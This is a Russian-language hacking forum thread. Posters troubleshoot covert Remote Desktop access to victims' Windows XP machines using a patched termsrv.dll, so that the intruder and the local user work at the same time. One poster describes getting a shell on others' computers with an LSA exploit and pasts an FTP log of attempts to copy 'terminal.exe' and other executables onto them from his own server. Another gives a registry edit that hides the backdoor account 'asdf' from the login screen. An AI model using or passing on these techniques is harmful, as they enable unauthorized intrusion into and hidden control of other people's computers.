"Разрешить быстрое переключение пользователей" - msgbox не должен выскакивать. - локально работающий юзер не вываливается из своей сессии. Оба должны работать одновременно!
протестил , запустил у жертвы terminal.exe (жертва комп ребутнула ) далее , msgbox вылетает и всё описанное выше вот скрины http://slil.ru/25300166
Ты уверен, что замена termsrv.dll прошла успешно и не восстановилась оригинальная версия? Проверь версию либы... Перезагрузку делал?
Так всё проверил , значит из 5 компов , 2 пашут нормально , 3 нет , то есть к двум можно подрубиться без проблем жертва ничего не видеть , а на остальных трёх вылетает сообщение (пытается установить сзязь asdf и тд ) хотя точно знаю , что на тех 3 компах , полностью отключенно восстановление системы , отключен бранмауэр , и CD WINDOWS XP PRO не вставлялся (после запуска terminal.exe) и компы были срузу перезагружены и не один раз , вот такие дела , самому уже просто интересно , почему это происходит .....
Ещё может зависеть от версии винды. У тебя точно все одинаковые? (XP, SP1, SP2 - разница точно есть) а вот если разные билды, то х.е.з. Ну раз на 2 работает - это уже гуд! А ты на тех на которых не получается посмотри параметр "быстрое перекл. пользователей" в системе...
2 -=lebed=- у меня проблема в следующем , когда я получаю эксплоитом LSA "сmd " чужого компа , я не могу залить terminal .exe , то есть на дедике это работает !!! Ставю себе TYPSoft FTP Server , создаваю свой аккаунт и заливаю F:\Documents and Settings\sss>ftp ftp> o К xx.xxx.xxx.xxx Связь с xx.xxx.xxx.xxx 220 TYPSoft FTP Server 1.10 ready... Пользователь (xx.xxx.xxx.xxxnone)): sss 331 Password required for sss. Пароль: 230 User sss logged in. ftp> dir 200 Port command successful. 150 Opening data connection for directory list. -rwxrwxrwx 1 ftp ftp 2918400 Dec 20 11:46 fly.exe -rwxrwxrwx 1 ftp ftp 349696 Dec 23 12:54 sex.exe -rw-rw-rw- 1 ftp ftp 149001 Dec 23 14:00 terminal.exe drw-rw-rw- 1 ftp ftp 0 Apr 30 19:00 sss 226 Transfer complete. ftp: 279 байт получено за 0,00 (сек) со скоростью 279000,00 (КБ/сек). ftp> Get terminal.exe 200 Port command successful. 150 Opening data connection for terminal.exe. 226 Transfer complete. ftp: 149001 байт получено за 0,16 (сек) со скоростью 2227,36 (КБ/сек). начинаю заливать через shell , доходит до F:\Documents and Settings\sss>ftp ftp> o К xx.xxx.xxx.xxx Связь с xx.xxx.xxx.xxx 220 TYPSoft FTP Server 1.10 ready... Пользователь (xx.xxx.xxx.xxxnone)): sss _ и затем всё зависает наглухо (( и так на всех компах к которым получил доступ , все службы вырубил net STOP... почему это произходит ? будь добр скажи зы: на хакер часть постов в этом топике почикали (мол ФЛУД) и вообще отношение модеров оставляет желать лучшего http://forum.xakep.ru/m_1033948/mpage_2/key_/tm.htm#1044503
Оффтоп (неудержался): Ого, я на ][ легенда уже ... ГЫ! Мдя... По сабжу: 1. Если ты "имеешь" систему сплоитом LSA - то это явно не XP SP2, а SP1 или просто XP 2. А если это не SP2 то мой файлик с настройками реестра может и не подойти. Надо попробовать всё сделать самому вручную на SP1, так как возможны ньюансы (я сам на SP1 и ниже не тестил...) P.S. Жаль потерянного времени на ][...
да ты прав , все тачки XP HOME , но больше интересует вот это факт вообще не только твой файлик не заливается и другие тоже ( уже сегодня не только через дедик проверил (через делик заливается ) к другу пришёл подрубился через его cmd к своему ftp и всё залили что было нужно к нему (затем удалил конечно пробую через shell , не фига (см выше)
Не зависает! вводи пароль! в консоли ничего не будет отображаться (даже курсор). P.S. Попробуй локально через cmd зайти на свой TYPSoft FTP Server 1.10, заходит? Имхо уже пошёл оффтоп..."Особенности работы клиента ftp через удалённый cmd-шелл"
Да вот именно ввожу пароль и всё зависает и весит глухо , локально захожу через cmd на свой TYPSoft без проблем , а через shell жерты ,после ввода пароля всё виснет и весит сорри за оффтоп
а локально заходит? попробуй другой FTP демон, я пользовался FTP Server by Pablo Software Solutions Version 1.52 - работало... ЗЫ имхо проблема с установлением соединения по ftp с твоим компом (NAT, фаер...)
Это типо наезд? Интересно, может Вы куда-то дальше продвинулись. Вы ж словами просто так не кидаетесь? руки не дошли до этого в своё время, а щас лень этим заниматься... Кто? если не ты сам? (с) Elekt
У кого не скрывается пользователь меняем: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserLis t] "asdf"=dword:00000000 на [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList] "asdf"=dword:00000000
Да, но потребуется перезагрузка и вероятность что сработает ~33% потому как он собран под конкретную сборку винды, на других может и не прокатить...